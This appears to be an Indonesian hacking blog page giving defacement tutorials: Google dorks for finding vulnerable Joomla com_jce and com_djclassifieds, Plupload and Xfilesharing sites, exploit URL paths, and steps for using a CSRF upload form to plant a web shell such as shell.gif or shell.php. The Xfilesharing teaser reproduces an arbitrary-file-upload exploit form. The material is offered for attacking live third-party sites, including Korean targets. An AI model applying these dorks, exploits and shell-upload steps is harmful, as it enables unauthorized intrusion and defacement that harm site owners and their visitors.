Joomla BT Websites vulnerability com_jce with csrf

-

Joomla BT Websites vulnerability com_jce with csrf

Dork : intext:"Built By BT Websites"
Exploit : index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20
Csrf : pastebin

Dorking dlu, anggap ae dah dapet target
Buat yg gamau ribet langsung make bot ae


Tambah exploit
Contoh site,com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20

Vuln? {"result":null,"error":"No function call specified!"}



Masukin target ke csrf 


Upload file gif/jpg/png



cek file di site,com/shell.gif



Ok gitu doang

Komentar

Posting Komentar

Postingan populer dari blog ini

Deface metode Joomla com_djclassifieds File Upload Vulnerability 

-
Gambar
Hey gan kali gw akan share deface metode com_djclassifieds, ok langsung simak ae Bahan2 yg dibutuhin - Hp / Pc - Internet (ya iya lah) - CSRF offline  / CSRF online Oh iya CSRF offline filetype na bisa diganti misal : shell.php simpan CSRF offline ext:html/htm - Exploit index.php?option=com_djclassifieds&task=upload&tmpl=component - Dork inurl:/com_djclassifieds inurl:/components/com_djclassifieds/ Kembangin lagi biar dapet web yang vuln Oh ya dork juga bisa dicari digambar Misal seperti ini masukan Exploit nya  index.php?option=com_djclassifieds&task=upload&tmpl=component Contoh site.com/components/ com_djclassifieds site.com/ index.php?option=com_djclassifieds&task=upload&tmpl=component atau site.com/[path]/components/ com_djclassifieds site.clm/[path]/index.php?option=com_djclassifieds&task=upload&tmpl=component Ciri ciri vuln Copy link pastekan / tempel ke csrf tadi
Baca selengkapnya

Deface metode Plupload Vulnerability File Upload situs Korea (upload shell)

-
Gambar
Hey gan kali gw akan share deface metode Plupload terbaru, ok langsung simak aja Bahan2 yg dibutuhin - Hp / Pc - Internet (ya iya lah) - Csrf  click me Oh iya filetype di csrf bisa diganti misal : shell.php simpan csrf ext:html/htm - Exploit plupload/examples/upload.php - Dork inul:/plupload site:kr inurl:/plupload/examples/upload.php site:kr Kembangin lagi biar dapet web yang vuln Ok langsung aja (perhatikan baik2) Cari di gambar ya Misal seperti ini Masuk ke web nya Klik gambar tadi yang sebelum masuk web Lihat gambar / open new tab bila sudah, lanjut Hapus tambahkan Exploit nya /plupload/examples/upload.php Misal http://target.kr/data/plupload/p1bhh6i89s1lehk1i1k1jbd1ptd1.jpg hapus masuk kan Exploit jadi http://target.kr/plupload/examples/upload.php Bila sudah akan seperti ini Copy link pastekan / tempel ke csrf tadi Bila sudah upload backdoor / shell kalian Tunggu hingga loading selesai  Bila vuln maka
Baca selengkapnya

Deface metode Xfilesharing 2.5.1 - Arbitrary File Upload

-
Gambar
# Exploit Title: Xfilesharing 2.5.1 - Arbitrary File Upload # Google Dork: inurl:/?op=registration # Date: 2019-11-4 #Exploit Author: Noman Riffat # Vendor Homepage : https://sibsoft.net/xfilesharing.html # Version: <=2.5.1 # CVE : CVE-2019-18951, CVE-2019-18952 ##################### Arbitrary File Upload ##################### <form action="http://xyz.com/cgi-bin/up.cgi" method="post" enctype="multipart/form-data"> <input type="text" name="sid" value="joe"> <input type="file" name="file"> <input type="submit" value="Upload" name="submit"> </form> Shell : http://xyz.com/cgi-bin/temp/joe/shell.php Noman Riffat, National Security Services Group Oman @nomanriffat, @nssgoman [#] Dork and CSRF disini https://pastebin.com/raw/xjv5kK5V 1. Dorking dulu kalo dah nemu target masukin Exploit nya contoh : http:/
Baca selengkapnya